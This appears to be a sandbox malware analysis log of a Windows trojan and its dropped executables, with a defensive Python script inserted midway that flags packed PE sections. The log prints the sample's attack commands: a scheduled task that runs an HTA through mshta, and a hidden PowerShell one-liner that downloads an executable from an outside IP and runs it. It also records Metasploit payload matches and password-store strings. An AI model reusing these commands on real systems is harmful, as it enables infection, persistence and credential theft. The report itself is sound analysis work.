Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C3781B
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C319B0
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C2997D
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C17920
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C37A4A
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C37CA7
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C31C77
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C49EEE
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C9BE44
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: 0_2_00C31F32
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BB61F0
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BF40E7
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BEC77D
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BE2CC0
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BB4EF0
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BECF09
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BB51A0
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BB5450
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BDB560
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BDF77B
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BF1977
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BF5D74
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: 20_2_00BF5E94
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CBB4C0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CF40E7
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CB61F0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CB51A0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CB5450
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CDB560
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CEC77D
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CDF77B
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CF1977
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CE2CC0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CF5D74
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CB4EF0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CF5E94
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: 21_2_00CECF09
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: String function: 00CD3FF0 appears 136 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe Code function: String function: 00CDA610 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: String function: 00BD3FF0 appears 136 times
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe Code function: String function: 00BDA610 appears 56 times
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: String function: 00C19CB3 appears 31 times
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: String function: 00C30A30 appears 46 times
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe Code function: String function: 00C2F9F2 appears 40 times
Source: aV2ffcSuKl.exe, 00000000.00000003.1299702573.0000000001803000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1297019666.0000000001939000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1297019666.0000000001939000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1299881436.0000000001803000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1297613344.0000000001940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1297613344.0000000001940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1299249795.0000000001802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1297443358.0000000001940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1297443358.0000000001940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1296937899.0000000001924000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1296937899.0000000001924000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000002.1300503172.0000000001807000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000002.1301126049.0000000001940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000002.1301126049.0000000001940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1297759572.0000000001940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FV_ORIGINALFILENAME vs aV2ffcSuKl.exe
Source: aV2ffcSuKl.exe, 00000000.00000003.1297759572.0000000001940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTF8 vs aV2ffcSuKl.exe
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE (reported four times)
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE (reported three times)
Source: aV2ffcSuKl.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 0000003E.00000002.2594796685.000000000DB1E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000003E.00000002.2594796685.000000000DBAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000003E.00000002.2594796685.000000000DAC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.dr Static PE information: Section: ZLIB complexity 0.9988700929752066
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.dr Static PE information: Section: vbshiqxp ZLIB complexity 0.9947482121573301
Source: rapes.exe.11.dr Static PE information: Section: ZLIB complexity 0.9988700929752066
Source: rapes.exe.11.dr Static PE information: Section: vbshiqxp ZLIB complexity 0.9947482121573301
Source: random[1].exe.16.dr Static PE information: Section: yououbtf ZLIB complexity 0.9947824306962941
Source: 7dbaa342f5.exe.16.dr Static PE information: Section: yououbtf ZLIB complexity 0.9947824306962941
Source: ILqcVeT[1].exe.16.dr Static PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
Source: ILqcVeT.exe.16.dr Static PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
Source: rXOl0pp[1].exe.16.dr Static PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
Source: rXOl0pp.exe.16.dr Static PE information: Section: hbloxsmk ZLIB complexity 0.9943536530446454
Source: random[1].exe0.16.dr Static PE information: Section: .CSS ZLIB complexity 1.0003273242728532
Source: acd63ce6fe.exe.16.dr Static PE information: Section: .CSS ZLIB complexity 1.0003273242728532
Source: random[2].exe0.16.dr Static PE information: Section: ZLIB complexity 0.999706737987988
Source: random[2].exe0.16.dr Static PE information: Section: qqigmylm ZLIB complexity 0.9950102390035906
Source: f0b421a199.exe.16.dr Static PE information: Section: ZLIB complexity 0.999706737987988
Source: f0b421a199.exe.16.dr Static PE information: Section: qqigmylm ZLIB complexity 0.9950102390035906
Source: random[3].exe.16.dr Static PE information: Section: hjgvekwy ZLIB complexity 0.994908279890489
Source: 5ef8bafe70.exe.16.dr Static PE information: Section: hjgvekwy ZLIB complexity 0.994908279890489
Source: random[2].exe1.16.dr Static PE information: Section: kxuwrjnk ZLIB complexity 0.9944404726068633
Source: df2fea7261.exe.16.dr Static PE information: Section: kxuwrjnk ZLIB complexity 0.9944404726068633
Source: vertualiziren[1].exe.22.dr Static PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277
Source: vertualiziren.exe.22.dr Static PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277
Source: benskvi.exe.24.dr Static PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277
Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.dr Static PE information: Section: ZLIB complexity 0.9988700929752066
Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.dr Static PE information: Section: vbshiqxp ZLIB complexity 0.9947482121573301
Source: 483d2fa8a0d53818306efeb32d3.exe.58.dr Static PE information: Section: ZLIB complexity 0.9988700929752066
Source: 483d2fa8a0d53818306efeb32d3.exe.58.dr Static PE information: Section: vbshiqxp ZLIB complexity 0.9947482121573301
Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.dr Static PE information: Section: ZLIB complexity 0.9988700929752066
Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.dr Static PE information: Section: vbshiqxp ZLIB complexity 0.9947482121573301
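The two static signatures above, unnamed sections in the dropped PEs and sections whose data is close to incompressible, are cheap to reproduce outside the sandbox. The script below is an added example, not Joe Sandbox code: it walks the section table of a PE image, reports each section's name, and computes a zlib ratio per section. "ZLIB complexity" is assumed here to mean the zlib-compressed size divided by the raw section size; that reading is consistent with the 1.0003 reported for the .CSS section, since incompressible data plus zlib framing comes out slightly larger than the input. The 0.99 cut-off and the sample PE built by build_sample_pe() are this example's own constructions, not one of the dropped files.

```python
"""
Section-name and zlib-complexity check for a PE image.

Added example, not Joe Sandbox code. 'ZLIB complexity' is assumed to be
len(zlib.compress(section)) / len(section). The sample image is constructed here
and is not one of the report's dropped files.
"""
import random
import struct
import zlib

# Assumed cut-off: the report's flagged sections all sit in the 0.994 .. 1.0003 range.
PACKED_THRESHOLD = 0.99


def parse_sections(pe: bytes):
    """Yield (name, raw_offset, raw_size) for every section header in the image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]   # IMAGE_FILE_HEADER.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]      # IMAGE_FILE_HEADER.SizeOfOptionalHeader
    table = coff + 20 + opt_size                               # section table follows the optional header
    for i in range(num_sections):
        raw_name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        yield raw_name.rstrip(b"\0").decode("latin-1"), raw_ptr, raw_size


def zlib_complexity(data: bytes) -> float:
    """Compressed-size / raw-size ratio: near 0 for repetitive data, about 1.0 for packed or encrypted data."""
    return len(zlib.compress(data, 9)) / len(data) if data else 0.0


def analyze(pe: bytes):
    """One finding per section, with the flags the report's two heuristics would raise."""
    findings = []
    for name, off, size in parse_sections(pe):
        ratio = zlib_complexity(pe[off:off + size])
        flags = []
        if name == "":
            flags.append("empty section name")
        if ratio > PACKED_THRESHOLD:
            flags.append("incompressible data (packed or encrypted)")
        findings.append({"name": name, "raw_size": size, "zlib_complexity": round(ratio, 4), "flags": flags})
    return findings


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 with an unnamed pseudo-random section and a NOP-filled .idata. Not loadable."""
    rng = random.Random(2025)
    packed = bytes(rng.getrandbits(8) for _ in range(4096))   # incompressible filler standing in for a packed payload
    plain = b"\x90" * 4096                                     # highly compressible filler
    sections = [(b"", packed), (b".idata", plain)]
    opt_size = 0xE0                                            # PE32 optional header size
    file_align = 0x200
    hdr_end = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    data_start = (hdr_end + file_align - 1) // file_align * file_align
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)    # Magic = PE32, remainder zeroed
    table, body, off = b"", b"", data_start
    for idx, (name, data) in enumerate(sections):
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), 0x1000 * (idx + 1),
                             len(data), off, 0, 0, 0, 0, 0x60000020)
        body += data
        off += len(data)
    image = dos + b"PE\0\0" + coff + opt + table
    return image + b"\0" * (data_start - len(image)) + body


if __name__ == "__main__":
    for finding in analyze(build_sample_pe()):
        print(finding)
```

Run analyze() over each dropped file instead of the constructed image to get the same per-section view the report gives; a section with no name and a ratio above 0.99 is the packed-stub pattern that every .idata-plus-unnamed-section sample in the list above shares.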
Source: vertualiziren.exe.22.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: vertualiziren[1].exe.22.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.16.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 7dbaa342f5.exe.16.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: benskvi.exe.24.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                                Source: random[1].exe0.16.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
Source: acd63ce6fe.exe.16.dr, gBMthepoZSL1ZVKpeA.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.spre.phis.troj.spyw.expl.evad.winEXE@131/130@932/100
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C837B5 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C710BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Code function: 0_2_00C142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nhDLtPT[1].exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4772:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2876:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Mutant created: \Sessions\1\BaseNamedObjects\bf11e9eb444cca0553e5dc41fdf05974
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\ProgramData\jnxnee\benskvi.exe | Mutant created: \Sessions\1\BaseNamedObjects\Test Task17
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1884:120:WilError_03
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | File created: C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta
Source: aV2ffcSuKl.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\mshta.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: ILqcVeT.exe, 00000017.00000003.2107115076.0000000005839000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000003.2232259653.000000000582D000.00000004.00000020.00020000.00000000.sdmp, rXOl0pp.exe, 00000019.00000003.2552037414.0000000005E49000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: aV2ffcSuKl.exe | Virustotal: Detection: 68%
Source: aV2ffcSuKl.exe | ReversingLabs: Detection: 63%
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | String found in binary or memory: " /add
Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | String found in binary or memory: " /add /y
Source: rapes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe | String found in binary or memory: " /add
Source: rapes.exe | String found in binary or memory: " /add /y
Source: nhDLtPT.exe | String found in binary or memory: " /add
Source: nhDLtPT.exe | String found in binary or memory: " /add /y
Source: Gxtuum.exe | String found in binary or memory: " /add
Source: Gxtuum.exe | String found in binary or memory: " /add /y
Source: unknown | Process created: C:\Users\user\Desktop\aV2ffcSuKl.exe "C:\Users\user\Desktop\aV2ffcSuKl.exe"
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\aV2ffcSuKl.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE"
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
